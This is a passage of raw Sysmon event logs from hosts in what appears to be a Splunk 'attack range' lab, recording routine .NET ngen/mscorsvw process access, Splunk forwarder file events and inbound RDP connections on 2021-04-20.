14:57:48.405{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEC-607E-530D-00000000BB01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.373{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-520D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.358{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEC-607E-520D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.358{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEC-607E-520D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.311{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-510D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.295{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBEC-607E-510D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.295{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEC-607E-510D-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.233{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-500D-00000000BB01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.217{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBEC-607E-500D-00000000BB01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.217{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEC-607E-500D-00000000BB01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.139{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-4F0D-00000000BB01}4588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.123{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEC-607E-4F0D-00000000BB01}4588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.123{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEC-607E-4F0D-00000000BB01}4588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000076160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:48.092{A7A01FEF-EBEC-607E-4E0D-00000000BB01}5704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1648-0\Microsoft.VisualStudio.Tools.Office.Runtime.Internal.dll2021-04-20 14:57:48.092 23542300x800000000000000076159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.076{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A9471EFE42E3AF2313DE8CAE0865A62,SHA256=6FE9612BA3EF717E10E2342B2F5F0C155F301D1C61E4D776DF3C6C95E60019DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.014{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-4E0D-00000000BB01}5704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.998{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEC-607E-4E0D-00000000BB01}5704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.998{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEC-607E-4E0D-00000000BB01}5704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000050326Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:46.761{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62177-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050325Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:46.664{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52528-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050324Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:46.625{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59219-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050323Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:48.791{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C59C8D7283AE8F070191C76C17B7D92F,SHA256=D7139BE9139D8A88F459103EB0522FCB30383ECAAE9AD0D626DAAFC0F4C4A503,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050322Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:48.572{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B3843B74F275D7F7F5D576DCFE630F2,SHA256=6B1AECF963DB6EC7150C80A6F3EBEE5808EEDDFA0B6AB9B1C32C1A54132EE9EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.951{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-650D-00000000BB01}4944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.936{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-650D-00000000BB01}4944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.936{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-650D-00000000BB01}4944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.858{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-640D-00000000BB01}3168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 